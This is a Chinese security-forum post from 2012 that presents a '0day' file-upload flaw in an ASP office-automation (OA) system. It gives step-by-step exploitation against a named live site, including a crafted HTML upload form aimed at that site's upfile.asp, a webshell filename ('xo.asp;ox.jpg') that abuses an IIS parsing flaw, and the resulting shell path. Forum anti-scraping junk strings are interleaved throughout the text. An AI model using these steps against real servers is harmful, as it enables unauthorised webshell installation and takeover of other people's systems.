找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2270|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞" ~* {/ ~5 H" A% I% M9 c

. }. Y  l+ ~4 J) A6 f系统介绍:
" e" H" ]" e, R6 I5 V8 l# P% o$ B! a  ?9 j
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
$ f( ~8 c/ y: R/ U
7 s: [1 r6 J, h% V& ?主要功能:1 p" A/ F% M: f, Q8 N2 s& U6 n
公司通告
+ Y$ T  k! @. O, V, K工作计划
8 G  L* v0 w. e- J: I5 }& [" v通讯助理 + l8 f& J3 b( B' A0 c5 `0 A
客户资源 1 N% E- X: x( _% u- N! \8 P
我的公文 8 d0 n$ z' K" L; Z; S
公文传阅 - S7 F) k+ m$ ]) C- D
公共资源
  o, V8 x, ?) N5 S4 |2 l  B: ?资源预约 3 N8 _% i0 u0 r/ D% U
今日考勤
+ U  c& A% z  p- q  _" G7 B个人计划 0 P" {" B3 A3 D0 Q# {  n
个人通讯录
3 V" d& M  U8 F: }+ \. q, z个人基本档案 8 Z5 _) n0 z6 W/ s' G6 v
未读邮件
( A+ F: q$ I! ?/ S' b4 W发邮件
) {0 X1 g9 K# m7 M! \2 F收件夹
  ^- U" ^, A- V3 Q寄件夹 0 G8 k$ S2 Z+ p* k7 `
网络硬盘 $ e- j1 q6 K) S
网络会议 , L/ @- U, U' f; W8 }5 L
网络调查
4 M6 m6 j' U1 M4 q$ J交流论坛
9 F7 h, _$ i' G: A4 H' J! ^) |/ k: D+ A) ~5 Q$ q5 E
有兴趣测试的朋友可以下源码看看" R! k3 ~. T! b
! `0 Z6 a# K- `  O/ x
源码下载:
% E- F  _" r! [2 n9 {9 h
+ y& V! Q. ^! a  E, uhttp://www.mycodes.net/30/4750.htm
/ y6 e, h; P# Y9 `0 }, [  z$ k' _% Z7 S: m+ _& r) U# j
漏洞介绍:
  w' R5 {5 c! b5 W: F, O% H- d5 E! t) C, F
由upfile.asp上传文件漏洞引起5 g, d4 z, w( \/ ~  Z

9 }3 X; u" z. G8 B- y, c/ \# m* I+ j测试方法:$ v! X+ y% l! I
9 g& R( }9 J' ]/ N+ E. k" H
使用名小子上传http://www.itlynn.com/upfile.asp即可5 O' J, m# p/ _, p# S

+ V- b: {! n. y* N* ?1 D/ {如果upfile.asp文件被删除不存在。5 q( [# `! G1 D" r6 }
7 j  x& ]- t4 I& I8 V
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp- O# d7 t7 z5 |
- O- T% N, p- K6 s/ E5 K5 N
如果存在那么将如下代码保存为upfile.html。
( Z+ M0 G7 z/ \# P8 n! i! J
+ F" Z- n  E3 X& Y4 w然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp, H1 J4 k4 [, r
8 Z, x  v# s) t# X/ ~0 ~6 E
& K" d4 C% Q6 E/ g. j
& L4 [) t6 H  D1 O5 V
01 <table border='0' align="center" cellpadding="5">
) i4 J# G. o8 O
' W1 }& m1 G6 H9 {- [02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. g* f( s  l. m' b. z' `5 a  d) c
  A) k( S0 f2 h# I03 <tr> 5 h4 r: p' O  X+ O! ?6 G

& [% r4 C- ]9 e6 n/ a* X04             <td>报错:</td> ; o3 ^4 x/ c1 Y
+ I# ], K; ^( z; s- k! T' ^
05             <td><input type='radio' name='errnumber' value='0'>
' f& ^0 i1 g& p" m& C/ x0 x  K( V7 ^& H! K& V
06               自动更名
8 e8 A, Z! E5 P# h! `" g+ I0 k1 Q/ R1 T" M& p) H; J  x
07               <input type='radio' name='errnumber' value='1' checked> / y9 H: ?& E, o1 z8 J5 `% o- A, j

' ?' X$ Z& b1 p7 D6 X% B& w  J08               报错方式
+ y- g" F" l" l+ X: V& m7 Z# V' @2 L$ [! T0 K! P) c
09               <input type='radio' name='errnumber' value='2'> - w9 ~$ N& R' Z- {' t+ V
* ~% L9 G' g2 [5 D8 a
10               直接覆盖</td> # Z4 ]% K0 \' T5 [

! K/ t, c5 a& V9 n' M11           </tr>
, ?5 v5 A" K8 V# }5 G. a- i+ H+ y8 a6 x" r! M) @5 k
12           <tr>
$ g- w$ r( H. D6 B6 j6 r6 Y3 x3 L9 ^, e
13             <td>主题:</td>
; y: G, X6 O/ q
! e1 W6 i  T% }( H; w7 v) @14             <td><input type='text' name='filename' size='30'></td>
& ^- g  B" J' _3 E
) ]  J% X2 ?: }4 b, H: E15           </tr>
% Z# T% j4 F4 M$ J( V) A& g  J
. S3 v& m, m4 U6 k) z16           <tr>
& a+ X+ N, w8 i0 {' _( h4 `3 ]5 R' k+ B0 w0 W! ?+ A
17             <td>文件:</td>
, q3 E* P+ z0 m3 d0 W! g- D2 o
4 Q9 i9 i1 p' d2 b5 }18             <td><input type="file"name="fruit"size="30"></td>
+ J0 v* f+ k' O% [
8 W5 M: f8 W! ^8 b5 D) F  i19           </tr> " R5 N- P) \" i7 S& E4 G
( V7 Q# p+ ~# b  V9 A/ Q7 s
20           <tr> . }# c! X% P/ \
# I$ j7 ?0 k5 h; i
21             <td valign='top'>简介:</td>
. G" e% A. ]( t" g- u/ D  I+ g1 u7 L
% V$ B- ]: ^& F# z( v" q, j22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> : h! m& @. Q0 x+ s  `" Z

$ p; X5 A6 u3 q& x23           </tr>
9 C& e( F; M9 X, X  @0 p7 g0 e. j, N& u* D
24   , W) R9 e) `" q( b  G1 N
) L: Y( T% T$ x' r
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
4 }* h) s/ P; o( e
* V1 h0 |6 G8 |$ n, G  G26           </tr> 5 q+ b3 O5 i% B, H9 K1 u" h

/ ]8 V5 l0 k6 D( G% i3 S; v27         </form> 9 x3 s! d; v& x$ Z& G9 A% U5 u0 [
+ Y, }6 R# k9 q% H' d# e! `
然后打开上传一个文件名为xo.asp;ox.jpg的文件。4 a9 ^, \- ]$ k
. A0 Q$ M8 j% i1 w6 Q
& w# z$ c8 e: L/ e: j

) O& ~6 @. Z7 Z: E& z( |上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
, p& |3 F/ G) |7 t5 P( q8 D; F! B, E0 ^: N# S& S
此漏洞需要配合解析漏洞利用。
* z+ H8 Z% Z) [9 A" I% q9 F1 s4 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表